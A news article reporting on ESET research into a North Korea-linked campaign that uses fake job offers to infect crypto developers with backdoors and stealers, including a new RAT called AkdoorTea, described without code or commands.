North Korean hackers target crypto developers with a new ‘AkdoorTea’ backdoor via fake job offers.
Crypto and blockchain developers are being targeted by a North Korea–linked hacking campaign. Security researchers at ESET found fake recruiters on platforms like LinkedIn and Upwork luring developers with bogus job postings. After a candidate responds, the scammers send either a GitHub “coding test” or a link to a video interview. In one approach, the victim is asked to clone a GitHub project that secretly installs malware; in another, a fake video page instructs them to run terminal commands to “fix” a non-existent camera or microphone issue.
These tactics install various backdoors and stealers (e.g. BeaverTail, InvisibleFerret, OtterCookie, WeaselStore) on the victim’s system. Notably, researchers also discovered a new RAT called AkdoorTea. This backdoor is delivered via a disguised NVIDIA driver update: a batch script downloads an “nvidiaRelease.zip” file and runs a hidden script that launches AkdoorTea along with other malware.
Fake Recruitment Attacks Target Crypto Devs
The attackers brand themselves as recruiters offering lucrative Web3 or crypto development jobs. In practice, this “social engineering” lure invites interest from developers, then tricks them into installing malware. As ESET explains, the campaign spans multiple platforms (LinkedIn, Upwork, Freelancer, Crypto Jobs List) and uses either a phishing coding challenge or a video assessment.
In all cases, the payloads are the same: once the victim engages, Trojans and infostealers are deployed. ESET’s analysis found that victims ended up infected with multiple malicious tools, including BeaverTail, InvisibleFerret, OtterCookie, GolangGhost (aka WeaselStore), and PylangGhost. These tools are designed to exfiltrate data—especially browser data and cryptocurrency wallet keys—and even maintain remote access on the compromised machines.
Advanced Malware Toolkit: AkdoorTea and Friends
Beyond the fake job scheme, the attackers use a sophisticated toolkit for data and crypto theft. For example, the TsunamiKit suite is dropped onto victim systems to harvest credentials, inject cryptocurrency miners, and install spyware. Another payload, Tropidoor, borrows code from Lazarus Group malware (like the LightlessCan RAT) and has been found on systems in countries such as Kenya, Colombia and Canada.
The newest addition, AkdoorTea, is a Windows-based backdoor. It arrives via a batch script that mimics an NVIDIA driver update: when executed, it unpacks malware payloads and launches the AkdoorTea implant on the system. (The name “AkdoorTea” hints at its links to North Korea’s Lazarus Group – it resembles the earlier “Akdoor” backdoor, itself a variant of the NukeSped/Manuscrypt malware.) In short, the attackers combine off-the-shelf and recycled tools into a heavy-duty malware arsenal to steal cryptocurrency and proprietary data from developers’ machines.
Security Implications and Risk
This campaign highlights how social engineering at scale can aid a state-run cybercrime effort. One study notes that employment scams have surged: fake job offers grew 265% since 2021, with over $2.7 million lost in just the first four months of 2025. North Korea’s hackers leverage this trend by exploiting human trust in online job ads. Moreover, the stolen developer profiles feed into a wider North Korean “IT worker” fraud scheme (sometimes called WageMole). In this ongoing fraud, North Korean operatives use stolen identities and fake résumés to apply for real tech jobs abroad.
For instance, researchers at Trellix identified a case where an applicant named “Kyle Lankford” – later tied to known North Korean indicators – nearly secured a position at a US healthcare company. ESET warns this is a “hybrid threat,” merging classic identity theft with cyberespionage. (For context, the FBI confirmed the Lazarus Group – North Korea’s cyber unit – stole $100 million in cryptocurrency in one 2022 bridge hack.)
